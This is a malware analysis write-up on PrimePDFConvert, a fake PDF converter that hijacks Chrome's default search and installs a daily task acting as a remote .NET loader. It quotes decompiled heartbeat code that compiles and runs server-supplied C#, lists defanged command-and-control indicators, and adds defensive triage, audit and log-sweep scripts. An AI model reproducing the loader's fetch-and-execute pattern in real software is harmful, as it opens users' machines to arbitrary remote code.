PrimePDFConvert: YAPA (Yet Another PDF Application) That Turns Out to Be a Malware Loader

Earlier this week, while analyzing yet another "free PDF converter" called PrimePDFConvert, I quickly observed behavior that is very similar to PDFSupernova, a browser hijacking malware I wrote about earlier this month.

There are a few key differences in this variant, however. The most notable is a daily scheduled task that runs c:\programdata\primepdfconvert.exe, which "checks in" with a remote server and can act as a malicious .NET loader.

The installer displays a clean, modern UI with a loading spinner, progress bars, and a lengthy EULA referencing “browser extensions” and “added search capabilities.” At first glance, it looks like a run-of-the-mill PUP (potentially unwanted program).

But underneath the surface?
It's a modular, remotely controlled malware loader with daily persistence, browser hijacking capabilities, and a Roslyn-powered remote code execution API.

Red Flags

  • Packed by Costura.Fody
  • Takes full-screen focus during install
  • Writes daily persistence (a scheduled task)
  • Uses Roslyn API calls to compile and load .NET code from remote servers
  • Finds Chrome and kills its process
  • Overwrites the Chrome "Web Data" file (default search hijacked to point at api.fuzzsearch[.]com)
  • Doesn't install a converter (instead drops a desktop shortcut to home.primepdfconvert[.]com)
  • Code-signing certificate: "Beyond Ideas LLC"
  • Advertiser: EVERNETIX TECHNOLOGY LTD
  • The .cab download is really an AES-encrypted, GZIP-compressed EXE that is dropped into ProgramData
Full screen focus examples below:

Network Flow from installer

hxxps://api.myprimeconfig.com/api/v1/call (remote code fetched and called)
hxxps://reppo.searchsparks.com/api/v1/report (JSON response for success and potential data return)
hxxps://api.fuzzsearch.com/api/v1/get_url_lead_prime
hxxps://installmyapps.com/pupdate/zaadf/a/PrimePDFConvert.cab
hxxps://api.kennsearch.com/api/v2/heartbeat (from the scheduled task; JSON response for success and potential data return)

The images below are snippets of the code being remotely loaded during the install (the process reaching out to api.myprimeconfig[.]com is the installer):

Scheduled task

Name: PrimePDFConvertTask
Schedule: <DaysInterval>1</DaysInterval>
Command: C:\ProgramData\PrimePDFConvert\PrimePDFConvert.exe
Arguments: <UID> (this is required to run properly)
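The task above is the persistence mechanism, so it is the thing a responder most wants to spot on other hosts. The following is an added example, not code from the post or from the malware: it parses a scheduled task exported in the standard Task Scheduler XML format (as produced by schtasks /query /xml) and flags the combination seen here, an executable under a user-writable directory, a DaysInterval trigger, and a single opaque positional argument such as the install UID. The sample XML is constructed to match the task described in the post; the UID value and the benign comparison task are placeholders, and the "user-writable prefix" heuristic is an analyst assumption, not a hard rule.

```python
"""Triage an exported Windows scheduled task for the persistence pattern described above."""
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML exports (schtasks /query /xml).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories a standard user can write to. A daily task launching from one of these is
# worth a second look (analyst heuristic, assumed here; tune for your environment).
USER_WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")

# Constructed sample modelled on the task described in the post; the UID is a placeholder.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\PrimePDFConvertTask</URI>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-01-01T12:00:00</StartBoundary>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\PrimePDFConvert\PrimePDFConvert.exe</Command>
      <Arguments>PLACEHOLDER-UID-0000</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison (hypothetical vendor updater, weekly, switch-style argument).
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ExampleVendor\Updater</URI></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-01-01T03:00:00</StartBoundary>
      <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Program Files\ExampleVendor\Updater.exe"</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""


def normalize_command(command):
    """Lower-case, strip surrounding quotes and expand the env vars commonly seen in exports."""
    cmd = command.strip().strip('"').lower()
    cmd = cmd.replace("%programdata%", "c:\\programdata")
    cmd = cmd.replace("%systemdrive%", "c:")
    return cmd


def triage_task_xml(xml_text):
    """Return a verdict dict for one task export."""
    root = ET.fromstring(xml_text)
    name = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    days = root.findtext(".//t:CalendarTrigger/t:ScheduleByDay/t:DaysInterval", default=None, namespaces=NS)
    command = root.findtext(".//t:Actions/t:Exec/t:Command", default="", namespaces=NS)
    arguments = root.findtext(".//t:Actions/t:Exec/t:Arguments", default="", namespaces=NS)

    reasons = []
    if normalize_command(command).startswith(USER_WRITABLE_PREFIXES):
        reasons.append("executable lives in a user-writable directory")
    if days is not None:
        reasons.append(f"recurs every {days.strip()} day(s)")
    # A lone token with no -/ switch prefix is how this loader carries its install UID.
    if arguments.strip() and not re.match(r"^[-/]", arguments.strip()):
        reasons.append("single opaque positional argument (possible install UID)")

    return {
        "name": name.strip(),
        "command": command.strip(),
        "arguments": arguments.strip(),
        "days_interval": int(days) if days and days.strip().isdigit() else None,
        "reasons": reasons,
        "suspicious": len(reasons) >= 2,
    }


if __name__ == "__main__":
    for sample in (SAMPLE_TASK_XML, BENIGN_TASK_XML):
        verdict = triage_task_xml(sample)
        print(verdict["name"], "->", "suspicious" if verdict["suspicious"] else "no flags")
        for reason in verdict["reasons"]:
            print("   -", reason)
```

Requiring two of the three signals keeps legitimate updaters that live in ProgramData from tripping on a single heuristic; the loader's task hits all three.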


The EXE here is initially downloaded as a .cab file (the .cab extension is fake). A section of code loaded remotely from api.myprimeconfig[.]com unpacks this file using an AES key/IV derived from the SHA256 hash of the productID and moduleID, then decompresses it and drops it in ProgramData.

This code was shown in a previous screenshot. Using this information, I was able to decrypt this; it is not really necessary, since the file already exists in its decrypted form in ProgramData, but it is still noteworthy for analysis.

Chrome Profile Hijack

  • Overwrites the file "Web Data" to set all searches to go through api.fuzzsearch[.]com
  • Modifies New Tab to point to cnn.com (likely as an evasion tactic)
  • Replaces keyword table and auto-fill data
  • Tracks UID information
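Because the hijack lives in the Chrome "Web Data" SQLite file rather than in the registry, a host sweep has to open that file. The example below is added here and is not code from the post; it builds a constructed, cut-down copy of the keywords and meta tables (the real file has many more columns and tables) and then audits it read-only for the three signs listed above: a search URL on the reported hijack domain, a default provider whose host is not on an allowlist, and a uid tracking parameter in the search URL. The allowlist and the placeholder UID are assumptions for the example.

```python
"""Audit a Chrome "Web Data" SQLite file for a hijacked default search provider."""
import os
import sqlite3
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, urlparse

# Domain the post reports hijacked searches being routed through.
KNOWN_HIJACK_HOSTS = {"api.fuzzsearch.com"}
# Hosts an analyst expects as a default search engine (assumption; tune per environment).
ALLOWED_SEARCH_HOSTS = {"www.google.com", "www.bing.com", "duckduckgo.com"}


def build_sample_webdata(path):
    """Create a constructed, cut-down Web Data file using the real table/column names."""
    conn = sqlite3.connect(path)
    conn.executescript(
        """
        CREATE TABLE meta (key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR);
        CREATE TABLE keywords (
            id INTEGER PRIMARY KEY,
            short_name VARCHAR NOT NULL,
            keyword VARCHAR NOT NULL,
            url VARCHAR NOT NULL,
            created_by_policy INTEGER DEFAULT 0
        );
        """
    )
    conn.executemany(
        "INSERT INTO keywords (id, short_name, keyword, url) VALUES (?, ?, ?, ?)",
        [
            (1, "Google", "google.com", "https://www.google.com/search?q={searchTerms}"),
            # Constructed hijack row; the uid value is a placeholder, not a real identifier.
            (2, "Search", "search",
             "https://api.fuzzsearch.com/api/v1/get_url_lead_prime?q={searchTerms}&uid=PLACEHOLDER-UID"),
        ],
    )
    # Chrome records the active engine's keywords.id under this meta key.
    conn.execute("INSERT INTO meta (key, value) VALUES ('Default Search Provider ID', '2')")
    conn.commit()
    conn.close()


def audit_webdata(path):
    """Open the file read-only and return one finding per keyword row that looks hijacked."""
    conn = sqlite3.connect(Path(path).resolve().as_uri() + "?mode=ro", uri=True)
    row = conn.execute("SELECT value FROM meta WHERE key = 'Default Search Provider ID'").fetchone()
    default_id = int(row[0]) if row and str(row[0]).isdigit() else None
    findings = []
    for kid, short_name, keyword, url in conn.execute("SELECT id, short_name, keyword, url FROM keywords"):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        reasons = []
        if host in KNOWN_HIJACK_HOSTS:
            reasons.append("known hijack domain")
        if kid == default_id and host not in ALLOWED_SEARCH_HOSTS:
            reasons.append("default search provider not on allowlist")
        if "uid" in parse_qs(parsed.query):
            reasons.append("search URL carries a tracking uid parameter")
        if reasons:
            findings.append({
                "id": kid, "short_name": short_name, "keyword": keyword, "host": host,
                "is_default": kid == default_id, "reasons": reasons,
            })
    conn.close()
    return findings


def run_demo():
    """Build the constructed sample in a temp directory and audit it."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "Web Data")
    build_sample_webdata(path)
    return audit_webdata(path)


if __name__ == "__main__":
    for finding in run_demo():
        print(f"[{finding['id']}] {finding['short_name']} -> {finding['host']}"
              f" (default={finding['is_default']}): {', '.join(finding['reasons'])}")
```

Opening the file through a file: URI with mode=ro matters on a live host: Chrome holds a lock on Web Data while running, and a read-only open avoids any chance of the audit itself modifying the profile. On a real system point audit_webdata at %LOCALAPPDATA%\Google\Chrome\User Data\Default\Web Data (or a forensic copy of it).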

Task Heartbeat Analysis

From c:\programdata\PrimePDFConvert.exe (decompiled; only the relevant lines are shown, elided parts marked with "..."):

    private static void SendHeartbeat(string serverUrl, string uid, string installDate)
    {
        ...  // builds and sends the heartbeat request; the HTTP response is held in `result`
        string result2 = result.Content.ReadAsStringAsync().Result;
        object obj = (javaScriptSerializer.DeserializeObject(result2) as Dictionary<string, object>)["data"];
        string text = ((obj != null) ? obj.ToString() : null);
        if (!string.IsNullOrEmpty(text))
        {
            Program.Start(text, uid);   // any non-empty "data" field is handed straight to the Roslyn loader
        }
    }

    private static async Task Start(string dataValue, string uid)
    {
        SyntaxTree syntaxTree = CSharpSyntaxTree.ParseText(dataValue, null, "", null, default(CancellationToken));
        ...  // the parsed source is compiled with Roslyn and run (remainder not shown)
    }

This code suggests that the heartbeat can load and run arbitrary code. When I tried to run c:\programdata\primepdfconvert.exe without a command-line argument, there was no network traffic.

When running with the proper argument shown in the scheduled task however, we do get a reply.


At this time it appears there is no data to load/execute from the server side. I decided to set up a Fiddler AutoResponder to create a file, and demonstrate that this can run code.


As you can see from the response, I can pass arbitrary code through here. Hopefully some more information will come out about these types of Hijackers/Loaders; until then, happy hunting.

Additional Reading

List of related malicious file converters on SecurityMagic-Github

Indicators

Indicator Type   Name                 Value
Domain           Loader               api.myprimeconfig.com/api/v1/call
Domain           Loader               reppo.searchsparks.com/api/v1/report
Domain           Search Hijack        api.fuzzsearch.com/api/v1/get_url_lead_prime
Domain           Loader               installmyapps.com/pupdate/zaadf/a/PrimePDFConvert.cab
Domain           Heartbeat/Loader     api.kennsearch.com/api/v2/heartbeat
Hash             pdfprimeconvert.exe  4e739ab1e0b0e91dda834a21f410a4c4
Hash             pdfprimeconvert.exe  ef8d55bd4ea5912df47c188c2f3a4790
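The indicators above are defanged (hxxps, [.]) as they appear in the post, so they need normalising before a sweep. The following added example, which is not code from the post, refangs the network indicators, indexes them by hostname, and runs them over constructed proxy log lines in a simple "timestamp client method target" format; a host matches if it equals an indicator host or is a subdomain of it, and CONNECT targets of the form host:port are handled alongside full URLs. The log lines and client addresses are constructed for the example, and the two MD5 values are the ones listed in the table.

```python
"""Sweep proxy log lines for the network indicators listed in the post."""
import re
from urllib.parse import urlparse

# Network indicators exactly as the post lists them (defanged), with their label.
DEFANGED_INDICATORS = {
    "hxxps://api.myprimeconfig[.]com/api/v1/call": "Loader",
    "hxxps://reppo.searchsparks[.]com/api/v1/report": "Loader",
    "hxxps://api.fuzzsearch[.]com/api/v1/get_url_lead_prime": "Search Hijack",
    "hxxps://installmyapps[.]com/pupdate/zaadf/a/PrimePDFConvert.cab": "Loader",
    "hxxps://api.kennsearch[.]com/api/v2/heartbeat": "Heartbeat/Loader",
}
# MD5 values from the indicator table.
KNOWN_MD5 = {"4e739ab1e0b0e91dda834a21f410a4c4", "ef8d55bd4ea5912df47c188c2f3a4790"}

# Constructed log lines (not from the post): "<timestamp> <client> <method> <target>".
SAMPLE_LOG = """\
2025-06-03T10:02:11Z 10.0.0.15 CONNECT api.myprimeconfig.com:443
2025-06-03T10:02:14Z 10.0.0.15 GET https://installmyapps.com/pupdate/zaadf/a/PrimePDFConvert.cab
2025-06-03T10:02:20Z 10.0.0.15 GET https://www.example.com/
2025-06-03T10:03:02Z 10.0.0.22 GET https://cdn.example.net/assets/app.js
2025-06-04T10:00:05Z 10.0.0.15 POST https://api.kennsearch.com/api/v2/heartbeat
2025-06-04T10:00:06Z 10.0.0.15 POST https://edge.api.kennsearch.com/api/v2/heartbeat
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def refang(ioc):
    """Undo the usual defanging so the indicator can be parsed as a URL."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


def host_of(target):
    """Extract the hostname from a full URL or from a CONNECT-style host:port target."""
    if "://" not in target:
        target = "//" + target  # lets urlparse treat it as a netloc
    return (urlparse(target).hostname or "").lower()


def build_domain_index(defanged=DEFANGED_INDICATORS):
    """Map indicator hostname -> label."""
    return {host_of(refang(url)): label for url, label in defanged.items()}


def matches_indicator(host, index):
    """Return (indicator_host, label) on an exact or subdomain match, else None."""
    for ioc_host, label in index.items():
        if host == ioc_host or host.endswith("." + ioc_host):
            return ioc_host, label
    return None


def scan_log(text, index=None):
    """Return a hit record for every log line whose target host matches an indicator."""
    index = index if index is not None else build_domain_index()
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # skip blank or malformed lines rather than failing the sweep
        timestamp, client, method, target = match.groups()
        hit = matches_indicator(host_of(target), index)
        if hit:
            hits.append({"time": timestamp, "client": client, "method": method,
                         "target": target, "indicator": hit[0], "label": hit[1]})
    return hits


def is_known_sample(md5_hex):
    """Check a file's MD5 (any case) against the table's hashes."""
    return md5_hex.strip().lower() in KNOWN_MD5


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['method']} {hit['target']}"
              f"  <- {hit['label']} ({hit['indicator']})")
```

Grouping the hits by client is the natural next step: the constructed log shows one host fetching the fake .cab during install and then checking in to the heartbeat endpoint the following day, which is exactly the daily-task pattern described earlier.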
